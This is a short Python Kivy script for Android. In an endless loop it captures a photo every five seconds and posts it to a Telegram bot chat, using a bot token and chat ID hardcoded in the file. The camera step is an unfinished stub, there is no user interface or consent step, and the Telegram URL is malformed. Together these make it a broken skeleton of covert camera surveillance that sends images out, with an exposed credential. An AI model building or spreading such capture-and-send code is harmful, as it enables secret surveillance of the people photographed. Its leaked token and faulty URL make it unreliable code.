import os
import requests
from time import sleep
from kivy.utils import platform

# Mocking for PC
if platform == 'android':
    from jnius import autoclass
    from android.storage import app_storage_path
    # Android Java Classes
    Context = autoclass('android.content.Context')
    CameraManager = autoclass('android.hardware.camera2.CameraManager')
else:
    def app_storage_path(): return os.getcwd()

BOT_TOKEN = "8779782009:AAG3f0rtyQkDt2chnFxjx_3GlZTMphwyNYk"
CHAT_ID = "5698261305"

def take_photo(path):
    if platform == 'android':
        # TODO: Insert Android Camera2 Jnius implementation here
        # For now, we assume the file is generated by a camera task
        print("Attempting to trigger Android Camera...")
    else:
        # On PC, create a dummy file to test the Telegram part
        with open(path, "w") as f:
            f.write("This is a test image file from PC.")

def capture_and_send():
    img_path = os.path.join(app_storage_path(), "capture.jpg")
    url = f"https://api.telegram.org{BOT_TOKEN}/sendPhoto"

    # 1. Try to take the photo
    take_photo(img_path)

    # 2. Send it if it exists
    if os.path.exists(img_path):
        try:
            with open(img_path, "rb") as photo:
                r = requests.post(url, data={"chat_id": CHAT_ID}, files={"photo": photo})
                print(f"Bot Response: {r.status_code}")
        except Exception as e:
            print(f"Network Error: {e}")

if __name__ == '__main__':
    while True:
        capture_and_send()
        sleep(5)
